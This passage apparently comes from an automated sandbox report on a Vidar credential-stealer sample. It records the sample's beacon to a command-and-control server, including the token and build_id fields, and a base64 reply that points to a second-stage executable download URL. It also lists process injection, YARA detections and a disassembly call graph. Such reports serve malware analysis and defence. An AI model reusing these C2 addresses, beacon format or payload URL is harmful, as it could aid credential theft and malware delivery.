                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                  Host: 49.12.197.9
                                                                                                                                                                  Content-Length: 331
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Cache-Control: no-cache
2024-10-03 01:36:28 UTC | 331 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 4a 45 48 44 48 49 45 47 49 49 49 44 48 49 44 48 44 48 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 34 30 35 32 36 63 61 32 39 30 66 64 30 31 37 61 61 61 62 62 35 63 64 36 31 66 66 32 64 64 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 48 44 48 49 45 47 49 49 49 44 48 49 44 48 44 48 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 62 37 33 31 30 65 61 62 34 32 34 35 30 30 36 66 31 32 35 63 34 34 32 64 61 32 64 31 65 35 30 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 48 44 48 49 45 47 49 49 49 44 48 49 44 48 44 48 4a 4a 0d 0a 43 6f 6e 74
                                                                                                                                                                  Data Ascii: ------JEHDHIEGIIIDHIDHDHJJContent-Disposition: form-data; name="token"5640526ca290fd017aaabb5cd61ff2dd------JEHDHIEGIIIDHIDHDHJJContent-Disposition: form-data; name="build_id"bb7310eab4245006f125c442da2d1e50------JEHDHIEGIIIDHIDHDHJJCont
2024-10-03 01:36:29 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Server: nginx
                                                                                                                                                                  Date: Thu, 03 Oct 2024 01:36:29 GMT
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                  Connection: close
2024-10-03 01:36:29 UTC | 91 | IN | Data Raw: 35 30 0d 0a 4d 54 49 32 4e 6a 6b 79 4d 6e 78 6f 64 48 52 77 4f 69 38 76 4d 54 51 33 4c 6a 51 31 4c 6a 51 30 4c 6a 45 77 4e 43 39 73 5a 47 31 7a 4c 32 45 30 4d 7a 51 34 4e 6a 45 79 4f 44 4d 30 4e 79 35 6c 65 47 56 38 4d 58 78 72 61 32 74 72 66 41 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                  Data Ascii: 50MTI2NjkyMnxodHRwOi8vMTQ3LjQ1LjQ0LjEwNC9sZG1zL2E0MzQ4NjEyODM0Ny5leGV8MXxra2trfA==0



                                                                                                                                                                  Target ID:0
                                                                                                                                                                  Start time:21:35:26
                                                                                                                                                                  Start date:02/10/2024
                                                                                                                                                                  Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                                                  Imagebase:0xa90000
                                                                                                                                                                  File size:418'480 bytes
                                                                                                                                                                  MD5 hash:37EC6AC7A655216941A30DC46FE1B189
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Yara matches:
                                                                                                                                                                  • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                  Reputation:low
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  Target ID:1
                                                                                                                                                                  Start time:21:35:26
                                                                                                                                                                  Start date:02/10/2024
                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Reputation:high
                                                                                                                                                                  Has exited:false

                                                                                                                                                                  Target ID:3
                                                                                                                                                                  Start time:21:35:27
                                                                                                                                                                  Start date:02/10/2024
                                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
                                                                                                                                                                  Imagebase:0x9d0000
                                                                                                                                                                  File size:43'016 bytes
                                                                                                                                                                  MD5 hash:5D1D74198D75640E889F0A577BBF31FC
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Yara matches:
                                                                                                                                                                  • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.3371829647.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                  • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                  Has exited:false


                                                                                                                                                                    Execution Graph

                                                                                                                                                                    Execution Coverage:11.9%
                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                    Signature Coverage:5.8%
                                                                                                                                                                    Total number of Nodes:984
                                                                                                                                                                    Total number of Limit Nodes:7
11230->11233 11231->11224 11234 6e81350a _unexpected 5 API calls 11233->11234 11235 6e813649 11234->11235 11236 6e813652 11235->11236 11237 6e813664 TlsFree 11235->11237 11236->11231 11238->10897 11623 6e810d3e 11638 6e812d8d 11623->11638 11628 6e810d66 11666 6e810d97 11628->11666 11629 6e810d5a 11630 6e811c30 __freea 14 API calls 11629->11630 11632 6e810d60 11630->11632 11634 6e811c30 __freea 14 API calls 11635 6e810d8a 11634->11635 11636 6e811c30 __freea 14 API calls 11635->11636 11637 6e810d90 11636->11637 11639 6e810d4f 11638->11639 11640 6e812d96 11638->11640 11644 6e8132e4 GetEnvironmentStringsW 11639->11644 11688 6e811872 11640->11688 11645 6e8132fc 11644->11645 11650 6e810d54 11644->11650 11646 6e813241 ___scrt_uninitialize_crt WideCharToMultiByte 11645->11646 11647 6e813319 11646->11647 11648 6e813323 FreeEnvironmentStringsW 11647->11648 11649 6e81332e 11647->11649 11648->11650 11651 6e811be2 15 API calls 11649->11651 11650->11628 11650->11629 11652 6e813335 11651->11652 11653 6e81333d 11652->11653 11654 6e81334e 11652->11654 11655 6e811c30 __freea 14 API calls 11653->11655 11656 6e813241 ___scrt_uninitialize_crt WideCharToMultiByte 11654->11656 11657 6e813342 FreeEnvironmentStringsW 11655->11657 11658 6e81335e 11656->11658 11659 6e81337f 11657->11659 11660 6e813365 11658->11660 11661 6e81336d 11658->11661 11659->11650 11662 6e811c30 __freea 14 API calls 11660->11662 11663 6e811c30 __freea 14 API calls 11661->11663 11664 6e81336b FreeEnvironmentStringsW 11662->11664 11663->11664 11664->11659 11667 6e810dac 11666->11667 11668 6e811d66 _unexpected 14 API calls 11667->11668 11669 6e810dd3 11668->11669 11670 6e810ddb 11669->11670 11681 6e810de5 11669->11681 11671 6e811c30 __freea 14 API calls 11670->11671 11672 6e810d6d 11671->11672 11672->11634 11673 6e810e42 11674 6e811c30 __freea 14 API calls 11673->11674 11674->11672 11675 6e811d66 _unexpected 14 API calls 11675->11681 11676 6e810e51 12111 6e810e79 11676->12111 11680 6e811c30 __freea 14 API calls 11683 
6e810e5e 11680->11683 11681->11673 11681->11675 11681->11676 11682 6e810e6c 11681->11682 11684 6e811c30 __freea 14 API calls 11681->11684 12102 6e811291 11681->12102 11685 6e8103c5 ___std_exception_copy 11 API calls 11682->11685 11686 6e811c30 __freea 14 API calls 11683->11686 11684->11681 11687 6e810e78 11685->11687 11686->11672 11689 6e811883 11688->11689 11690 6e81187d 11688->11690 11692 6e8136ab _unexpected 6 API calls 11689->11692 11710 6e811889 11689->11710 11691 6e81366c _unexpected 6 API calls 11690->11691 11691->11689 11693 6e81189d 11692->11693 11696 6e811d66 _unexpected 14 API calls 11693->11696 11693->11710 11695 6e81188e 11713 6e812b98 11695->11713 11698 6e8118ad 11696->11698 11699 6e8118b5 11698->11699 11700 6e8118ca 11698->11700 11701 6e8136ab _unexpected 6 API calls 11699->11701 11702 6e8136ab _unexpected 6 API calls 11700->11702 11703 6e8118c1 11701->11703 11704 6e8118d6 11702->11704 11707 6e811c30 __freea 14 API calls 11703->11707 11705 6e8118e9 11704->11705 11706 6e8118da 11704->11706 11709 6e8115b9 _unexpected 14 API calls 11705->11709 11708 6e8136ab _unexpected 6 API calls 11706->11708 11707->11710 11708->11703 11711 6e8118f4 11709->11711 11710->11695 11736 6e8112eb 11710->11736 11712 6e811c30 __freea 14 API calls 11711->11712 11712->11695 11884 6e812ced 11713->11884 11718 6e812bdb 11718->11639 11721 6e812c02 11909 6e812de8 11721->11909 11722 6e812bf4 11723 6e811c30 __freea 14 API calls 11722->11723 11723->11718 11726 6e812c3a 11727 6e811d53 __dosmaperr 14 API calls 11726->11727 11729 6e812c3f 11727->11729 11728 6e812c81 11731 6e812cca 11728->11731 11920 6e812811 11728->11920 11732 6e811c30 __freea 14 API calls 11729->11732 11730 6e812c55 11730->11728 11733 6e811c30 __freea 14 API calls 11730->11733 11735 6e811c30 __freea 14 API calls 11731->11735 11732->11718 11733->11728 11735->11718 11747 6e813b88 11736->11747 11739 6e8112fb 11741 6e811305 IsProcessorFeaturePresent 11739->11741 11746 6e811324 11739->11746 11743 6e811311 11741->11743 11777 
6e81019c 11743->11777 11783 6e810a15 11746->11783 11786 6e813ab6 11747->11786 11750 6e813bcd 11753 6e813bd9 ___scrt_is_nonwritable_in_current_image 11750->11753 11751 6e811908 __dosmaperr 14 API calls 11759 6e813c0a __InternalCxxFrameHandler 11751->11759 11752 6e813c29 11755 6e811d53 __dosmaperr 14 API calls 11752->11755 11753->11751 11753->11752 11754 6e813c3b __InternalCxxFrameHandler 11753->11754 11753->11759 11756 6e813c71 __InternalCxxFrameHandler 11754->11756 11800 6e811b83 EnterCriticalSection 11754->11800 11757 6e813c2e 11755->11757 11761 6e813dab 11756->11761 11762 6e813cae 11756->11762 11773 6e813cdc 11756->11773 11797 6e810398 11757->11797 11759->11752 11759->11754 11776 6e813c13 11759->11776 11765 6e813db6 11761->11765 11832 6e811bcb LeaveCriticalSection 11761->11832 11762->11773 11801 6e8117b7 GetLastError 11762->11801 11767 6e810a15 __InternalCxxFrameHandler 21 API calls 11765->11767 11769 6e813dbe 11767->11769 11770 6e8117b7 _unexpected 39 API calls 11774 6e813d31 11770->11774 11772 6e8117b7 _unexpected 39 API calls 11772->11773 11828 6e813d57 11773->11828 11775 6e8117b7 _unexpected 39 API calls 11774->11775 11774->11776 11775->11776 11776->11739 11778 6e8101b8 __InternalCxxFrameHandler std::bad_exception::bad_exception 11777->11778 11779 6e8101e4 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 11778->11779 11782 6e8102b5 __InternalCxxFrameHandler 11779->11782 11780 6e80b8f0 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 11781 6e8102d3 11780->11781 11781->11746 11782->11780 11784 6e810852 __InternalCxxFrameHandler 21 API calls 11783->11784 11785 6e810a26 11784->11785 11787 6e813ac2 ___scrt_is_nonwritable_in_current_image 11786->11787 11792 6e811b83 EnterCriticalSection 11787->11792 11789 6e813ad0 11793 6e813b12 11789->11793 11792->11789 11796 6e811bcb LeaveCriticalSection 11793->11796 11795 6e8112f0 11795->11739 11795->11750 11796->11795 11833 6e8102e4 11797->11833 11800->11756 11802 6e8117cd 
11801->11802 11806 6e8117d3 11801->11806 11804 6e81366c _unexpected 6 API calls 11802->11804 11803 6e8136ab _unexpected 6 API calls 11805 6e8117ef 11803->11805 11804->11806 11808 6e811d66 _unexpected 14 API calls 11805->11808 11825 6e8117d7 SetLastError 11805->11825 11806->11803 11806->11825 11809 6e811804 11808->11809 11812 6e81181d 11809->11812 11813 6e81180c 11809->11813 11810 6e811867 11810->11772 11811 6e81186c 11814 6e8112eb __FrameHandler3::FrameUnwindToState 37 API calls 11811->11814 11816 6e8136ab _unexpected 6 API calls 11812->11816 11815 6e8136ab _unexpected 6 API calls 11813->11815 11817 6e811871 11814->11817 11818 6e81181a 11815->11818 11819 6e811829 11816->11819 11823 6e811c30 __freea 14 API calls 11818->11823 11820 6e811844 11819->11820 11821 6e81182d 11819->11821 11824 6e8115b9 _unexpected 14 API calls 11820->11824 11822 6e8136ab _unexpected 6 API calls 11821->11822 11822->11818 11823->11825 11826 6e81184f 11824->11826 11825->11810 11825->11811 11827 6e811c30 __freea 14 API calls 11826->11827 11827->11825 11829 6e813d23 11828->11829 11830 6e813d5b 11828->11830 11829->11770 11829->11774 11829->11776 11883 6e811bcb LeaveCriticalSection 11830->11883 11832->11765 11834 6e8102f6 ___std_exception_copy 11833->11834 11839 6e81031b 11834->11839 11836 6e81030e 11837 6e8100d4 ___std_exception_copy 39 API calls 11836->11837 11838 6e810319 11837->11838 11838->11776 11840 6e810332 11839->11840 11841 6e81032b 11839->11841 11846 6e810340 11840->11846 11854 6e810110 11840->11854 11850 6e810139 GetLastError 11841->11850 11844 6e810367 11844->11846 11857 6e8103c5 IsProcessorFeaturePresent 11844->11857 11846->11836 11847 6e810397 11848 6e8102e4 ___std_exception_copy 39 API calls 11847->11848 11849 6e8103a4 11848->11849 11849->11836 11851 6e810152 11850->11851 11861 6e8119b9 11851->11861 11855 6e810134 11854->11855 11856 6e81011b GetLastError SetLastError 11854->11856 11855->11844 11856->11844 11858 6e8103d1 11857->11858 11859 6e81019c __InternalCxxFrameHandler 8 API 
calls 11858->11859 11860 6e8103e6 GetCurrentProcess TerminateProcess 11859->11860 11860->11847 11862 6e8119d2 11861->11862 11863 6e8119cc 11861->11863 11864 6e8136ab _unexpected 6 API calls 11862->11864 11882 6e81016a SetLastError 11862->11882 11865 6e81366c _unexpected 6 API calls 11863->11865 11866 6e8119ec 11864->11866 11865->11862 11867 6e811d66 _unexpected 14 API calls 11866->11867 11866->11882 11868 6e8119fc 11867->11868 11869 6e811a04 11868->11869 11870 6e811a19 11868->11870 11871 6e8136ab _unexpected 6 API calls 11869->11871 11872 6e8136ab _unexpected 6 API calls 11870->11872 11873 6e811a10 11871->11873 11874 6e811a25 11872->11874 11879 6e811c30 __freea 14 API calls 11873->11879 11875 6e811a29 11874->11875 11876 6e811a38 11874->11876 11877 6e8136ab _unexpected 6 API calls 11875->11877 11878 6e8115b9 _unexpected 14 API calls 11876->11878 11877->11873 11880 6e811a43 11878->11880 11879->11882 11881 6e811c30 __freea 14 API calls 11880->11881 11881->11882 11882->11840 11883->11829 11885 6e812cf9 ___scrt_is_nonwritable_in_current_image 11884->11885 11887 6e812d13 11885->11887 11928 6e811b83 EnterCriticalSection 11885->11928 11888 6e812bc2 11887->11888 11891 6e8112eb __FrameHandler3::FrameUnwindToState 39 API calls 11887->11891 11895 6e81291f 11888->11895 11889 6e812d4f 11929 6e812d6c 11889->11929 11892 6e812d8c 11891->11892 11893 6e812d23 11893->11889 11894 6e811c30 __freea 14 API calls 11893->11894 11894->11889 11933 6e812423 11895->11933 11898 6e812940 GetOEMCP 11900 6e812969 11898->11900 11899 6e812952 11899->11900 11901 6e812957 GetACP 11899->11901 11900->11718 11902 6e811be2 11900->11902 11901->11900 11903 6e811c20 11902->11903 11907 6e811bf0 _unexpected 11902->11907 11904 6e811d53 __dosmaperr 14 API calls 11903->11904 11906 6e811c1e 11904->11906 11905 6e811c0b HeapAlloc 11905->11906 11905->11907 11906->11721 11906->11722 11907->11903 11907->11905 11976 6e8104b5 11907->11976 11910 6e81291f 41 API calls 11909->11910 11911 6e812e08 11910->11911 11912 6e812f0d 
11911->11912 11914 6e812e45 IsValidCodePage 11911->11914 11919 6e812e60 std::bad_exception::bad_exception 11911->11919 11913 6e80b8f0 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 11912->11913 11915 6e812c2f 11913->11915 11914->11912 11916 6e812e57 11914->11916 11915->11726 11915->11730 11917 6e812e80 GetCPInfo 11916->11917 11916->11919 11917->11912 11917->11919 11990 6e8129f3 11919->11990 11921 6e81281d ___scrt_is_nonwritable_in_current_image 11920->11921 12076 6e811b83 EnterCriticalSection 11921->12076 11923 6e812827 12077 6e81285e 11923->12077 11928->11893 11932 6e811bcb LeaveCriticalSection 11929->11932 11931 6e812d73 11931->11887 11932->11931 11934 6e812441 11933->11934 11935 6e81243a 11933->11935 11934->11935 11936 6e8117b7 _unexpected 39 API calls 11934->11936 11935->11898 11935->11899 11937 6e812462 11936->11937 11941 6e81420d 11937->11941 11942 6e814220 11941->11942 11943 6e812478 11941->11943 11942->11943 11949 6e8146ec 11942->11949 11945 6e81426b 11943->11945 11946 6e814293 11945->11946 11947 6e81427e 11945->11947 11946->11935 11947->11946 11971 6e812dd5 11947->11971 11950 6e8146f8 ___scrt_is_nonwritable_in_current_image 11949->11950 11951 6e8117b7 _unexpected 39 API calls 11950->11951 11952 6e814701 11951->11952 11953 6e814747 11952->11953 11962 6e811b83 EnterCriticalSection 11952->11962 11953->11943 11955 6e81471f 11963 6e81476d 11955->11963 11960 6e8112eb __FrameHandler3::FrameUnwindToState 39 API calls 11961 6e81476c 11960->11961 11962->11955 11964 6e81477b _unexpected 11963->11964 11966 6e814730 11963->11966 11965 6e8144a0 _unexpected 14 API calls 11964->11965 11964->11966 11965->11966 11967 6e81474c 11966->11967 11970 6e811bcb LeaveCriticalSection 11967->11970 11969 6e814743 11969->11953 11969->11960 11970->11969 11972 6e8117b7 _unexpected 39 API calls 11971->11972 11973 6e812dda 11972->11973 11974 6e812ced ___scrt_uninitialize_crt 39 API calls 11973->11974 11975 6e812de5 11974->11975 11975->11946 11979 6e8104e1 
11976->11979 11980 6e8104ed ___scrt_is_nonwritable_in_current_image 11979->11980 11985 6e811b83 EnterCriticalSection 11980->11985 11982 6e8104f8 __InternalCxxFrameHandler 11986 6e81052f 11982->11986 11985->11982 11989 6e811bcb LeaveCriticalSection 11986->11989 11988 6e8104c0 11988->11907 11989->11988 11991 6e812a1b GetCPInfo 11990->11991 12000 6e812ae4 11990->12000 11996 6e812a33 11991->11996 11991->12000 11993 6e80b8f0 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 11995 6e812b96 11993->11995 11995->11912 12001 6e814a2d 11996->12001 11999 6e8153e3 43 API calls 11999->12000 12000->11993 12002 6e812423 39 API calls 12001->12002 12003 6e814a4d 12002->12003 12021 6e813187 12003->12021 12005 6e814b09 12008 6e80b8f0 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 12005->12008 12006 6e814b01 12024 6e814b2e 12006->12024 12007 6e814a7a 12007->12005 12007->12006 12010 6e811be2 15 API calls 12007->12010 12012 6e814a9f __alloca_probe_16 std::bad_exception::bad_exception 12007->12012 12011 6e812a9b 12008->12011 12010->12012 12016 6e8153e3 12011->12016 12012->12006 12013 6e813187 ___scrt_uninitialize_crt MultiByteToWideChar 12012->12013 12014 6e814ae8 12013->12014 12014->12006 12015 6e814aef GetStringTypeW 12014->12015 12015->12006 12017 6e812423 39 API calls 12016->12017 12018 6e8153f6 12017->12018 12030 6e8151f4 12018->12030 12028 6e8130ef 12021->12028 12025 6e814b3a 12024->12025 12026 6e814b4b 12024->12026 12025->12026 12027 6e811c30 __freea 14 API calls 12025->12027 12026->12005 12027->12026 12029 6e813100 MultiByteToWideChar 12028->12029 12029->12007 12031 6e81520f 12030->12031 12032 6e813187 ___scrt_uninitialize_crt MultiByteToWideChar 12031->12032 12036 6e815253 12032->12036 12033 6e8153ce 12034 6e80b8f0 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 12033->12034 12035 6e812abc 12034->12035 12035->11999 12036->12033 12037 6e811be2 15 API calls 12036->12037 12039 6e815279 __alloca_probe_16 12036->12039 
12050 6e815321 12036->12050 12037->12039 12038 6e814b2e __freea 14 API calls 12038->12033 12040 6e813187 ___scrt_uninitialize_crt MultiByteToWideChar 12039->12040 12039->12050 12041 6e8152c2 12040->12041 12041->12050 12058 6e813738 12041->12058 12044 6e815330 12046 6e8153b9 12044->12046 12047 6e811be2 15 API calls 12044->12047 12051 6e815342 __alloca_probe_16 12044->12051 12045 6e8152f8 12049 6e813738 6 API calls 12045->12049 12045->12050 12048 6e814b2e __freea 14 API calls 12046->12048 12047->12051 12048->12050 12049->12050 12050->12038 12051->12046 12052 6e813738 6 API calls 12051->12052 12053 6e815385 12052->12053 12053->12046 12064 6e813241 12053->12064 12055 6e81539f 12055->12046 12056 6e8153a8 12055->12056 12057 6e814b2e __freea 14 API calls 12056->12057 12057->12050 12067 6e81340b 12058->12067 12062 6e813789 LCMapStringW 12063 6e813749 12062->12063 12063->12044 12063->12045 12063->12050 12066 6e813254 ___scrt_uninitialize_crt 12064->12066 12065 6e813292 WideCharToMultiByte 12065->12055 12066->12065 12068 6e81350a _unexpected 5 API calls 12067->12068 12069 6e813421 12068->12069 12069->12063 12070 6e813795 12069->12070 12073 6e813425 12070->12073 12072 6e8137a0 12072->12062 12074 6e81350a _unexpected 5 API calls 12073->12074 12075 6e81343b 12074->12075 12075->12072 12076->11923 12087 6e812fed 12077->12087 12079 6e812880 12080 6e812fed 39 API calls 12079->12080 12081 6e81289f 12080->12081 12082 6e811c30 __freea 14 API calls 12081->12082 12083 6e812834 12081->12083 12082->12083 12084 6e812852 12083->12084 12101 6e811bcb LeaveCriticalSection 12084->12101 12086 6e812840 12086->11731 12088 6e812ffe 12087->12088 12096 6e812ffa __InternalCxxFrameHandler 12087->12096 12089 6e813005 12088->12089 12091 6e813018 std::bad_exception::bad_exception 12088->12091 12090 6e811d53 __dosmaperr 14 API calls 12089->12090 12092 6e81300a 12090->12092 12094 6e813046 12091->12094 12095 6e81304f 12091->12095 12091->12096 12093 6e810398 ___std_exception_copy 39 API calls 12092->12093 
12093->12096 12097 6e811d53 __dosmaperr 14 API calls 12094->12097 12095->12096 12098 6e811d53 __dosmaperr 14 API calls 12095->12098 12096->12079 12099 6e81304b 12097->12099 12098->12099 12100 6e810398 ___std_exception_copy 39 API calls 12099->12100 12100->12096 12101->12086 12103 6e8112ad 12102->12103 12104 6e81129f 12102->12104 12105 6e811d53 __dosmaperr 14 API calls 12103->12105 12104->12103 12109 6e8112c5 12104->12109 12106 6e8112b5 12105->12106 12107 6e810398 ___std_exception_copy 39 API calls 12106->12107 12108 6e8112bf 12107->12108 12108->11681 12109->12108 12110 6e811d53 __dosmaperr 14 API calls 12109->12110 12110->12106 12112 6e810e57 12111->12112 12113 6e810e86 12111->12113 12112->11680 12114 6e810e9d 12113->12114 12115 6e811c30 __freea 14 API calls 12113->12115 12116 6e811c30 __freea 14 API calls 12114->12116 12115->12113 12116->12112 11239 6e80b964 11240 6e80b9a2 11239->11240 11241 6e80b96f 11239->11241 11242 6e80babe __DllMainCRTStartup@12 86 API calls 11240->11242 11243 6e80b994 11241->11243 11244 6e80b974 11241->11244 11250 6e80b97e 11242->11250 11251 6e80b9b7 11243->11251 11246 6e80b979 11244->11246 11247 6e80b98a 11244->11247 11246->11250 11265 6e80bfe2 11246->11265 11270 6e80bfc3 11247->11270 11252 6e80b9c3 ___scrt_is_nonwritable_in_current_image 11251->11252 11278 6e80c053 11252->11278 11254 6e80b9ca __DllMainCRTStartup@12 11255 6e80b9f1 11254->11255 11256 6e80bab6 11254->11256 11263 6e80ba2d ___scrt_is_nonwritable_in_current_image __InternalCxxFrameHandler 11254->11263 11289 6e80bfb5 11255->11289 11258 6e80c1f2 __DllMainCRTStartup@12 4 API calls 11256->11258 11259 6e80babd 11258->11259 11260 6e80ba00 __RTC_Initialize 11260->11263 11292 6e80bed3 InitializeSListHead 11260->11292 11262 6e80ba0e 11262->11263 11293 6e80bf8a 11262->11293 11263->11250 11354 6e81120b 11265->11354 11557 6e80e6ec 11270->11557 11273 6e80bfcc 11273->11250 11276 6e80bfdf 11276->11250 11277 6e80e6f7 21 API calls 11277->11273 11279 6e80c05c 11278->11279 11297 6e80c3b8 
IsProcessorFeaturePresent 11279->11297 11283 6e80c071 11283->11254 11284 6e80c06d 11284->11283 11307 6e8111ee 11284->11307 11287 6e80c088 11287->11254 11288 6e80e6ff ___scrt_uninitialize_crt 7 API calls 11288->11283 11348 6e80c08c 11289->11348 11291 6e80bfbc 11291->11260 11292->11262 11294 6e80bf8f ___scrt_release_startup_lock 11293->11294 11295 6e80c3b8 IsProcessorFeaturePresent 11294->11295 11296 6e80bf98 11294->11296 11295->11296 11296->11263 11298 6e80c068 11297->11298 11299 6e80e6cd 11298->11299 11310 6e80eb9c 11299->11310 11302 6e80e6d6 11302->11284 11304 6e80e6de 11305 6e80e6e9 11304->11305 11306 6e80ebd8 ___vcrt_uninitialize_locks DeleteCriticalSection 11304->11306 11305->11284 11306->11302 11339 6e813a1d 11307->11339 11311 6e80eba5 11310->11311 11313 6e80ebce 11311->11313 11314 6e80e6d2 11311->11314 11324 6e80f1ce 11311->11324 11315 6e80ebd8 ___vcrt_uninitialize_locks DeleteCriticalSection 11313->11315 11314->11302 11316 6e80eb4e 11314->11316 11315->11314 11329 6e80f0df 11316->11329 11321 6e80eb7e 11321->11304 11322 6e80eb81 ___vcrt_uninitialize_ptd 6 API calls 11323 6e80eb63 11322->11323 11323->11304 11325 6e80eff4 ___vcrt_InitializeCriticalSectionEx 5 API calls 11324->11325 11326 6e80f1e8 11325->11326 11327 6e80f206 InitializeCriticalSectionAndSpinCount 11326->11327 11328 6e80f1f1 11326->11328 11327->11328 11328->11311 11330 6e80eff4 ___vcrt_InitializeCriticalSectionEx 5 API calls 11329->11330 11331 6e80f0f9 11330->11331 11332 6e80f112 TlsAlloc 11331->11332 11333 6e80eb58 11331->11333 11333->11323 11334 6e80f190 11333->11334 11335 6e80eff4 ___vcrt_InitializeCriticalSectionEx 5 API calls 11334->11335 11336 6e80f1aa 11335->11336 11337 6e80f1c5 TlsSetValue 11336->11337 11338 6e80eb71 11336->11338 11337->11338 11338->11321 11338->11322 11340 6e813a2d 11339->11340 11341 6e80c07a 11339->11341 11340->11341 11343 6e8138e1 11340->11343 11341->11287 11341->11288 11344 6e8138e8 11343->11344 11345 6e81392b GetStdHandle 11344->11345 11346 6e81398d 11344->11346 11347 
6e81393e GetFileType 11344->11347 11345->11344 11346->11340 11347->11344 11349 6e80c098 11348->11349 11350 6e80c09c 11348->11350 11349->11291 11351 6e80c0a9 ___scrt_release_startup_lock 11350->11351 11352 6e80c1f2 __DllMainCRTStartup@12 4 API calls 11350->11352 11351->11291 11353 6e80c112 11352->11353 11360 6e81178b 11354->11360 11357 6e80e6f7 11540 6e80ea83 11357->11540 11361 6e811795 11360->11361 11364 6e80bfe7 11360->11364 11362 6e81366c _unexpected 6 API calls 11361->11362 11363 6e81179c 11362->11363 11363->11364 11365 6e8136ab _unexpected 6 API calls 11363->11365 11364->11357 11366 6e8117af 11365->11366 11368 6e811652 11366->11368 11369 6e81165d 11368->11369 11370 6e81166d 11368->11370 11374 6e811673 11369->11374 11370->11364 11373 6e811c30 __freea 14 API calls 11373->11370 11375 6e81168e 11374->11375 11376 6e811688 11374->11376 11378 6e811c30 __freea 14 API calls 11375->11378 11377 6e811c30 __freea 14 API calls 11376->11377 11377->11375 11379 6e81169a 11378->11379 11380 6e811c30 __freea 14 API calls 11379->11380 11381 6e8116a5 11380->11381 11382 6e811c30 __freea 14 API calls 11381->11382 11383 6e8116b0 11382->11383 11384 6e811c30 __freea 14 API calls 11383->11384 11385 6e8116bb 11384->11385 11386 6e811c30 __freea 14 API calls 11385->11386 11387 6e8116c6 11386->11387 11388 6e811c30 __freea 14 API calls 11387->11388 11389 6e8116d1 11388->11389 11390 6e811c30 __freea 14 API calls 11389->11390 11391 6e8116dc 11390->11391 11392 6e811c30 __freea 14 API calls 11391->11392 11393 6e8116e7 11392->11393 11394 6e811c30 __freea 14 API calls 11393->11394 11395 6e8116f5 11394->11395 11400 6e81149f 11395->11400 11401 6e8114ab ___scrt_is_nonwritable_in_current_image 11400->11401 11416 6e811b83 EnterCriticalSection 11401->11416 11403 6e8114df 11417 6e8114fe 11403->11417 11405 6e8114b5 11405->11403 11407 6e811c30 __freea 14 API calls 11405->11407 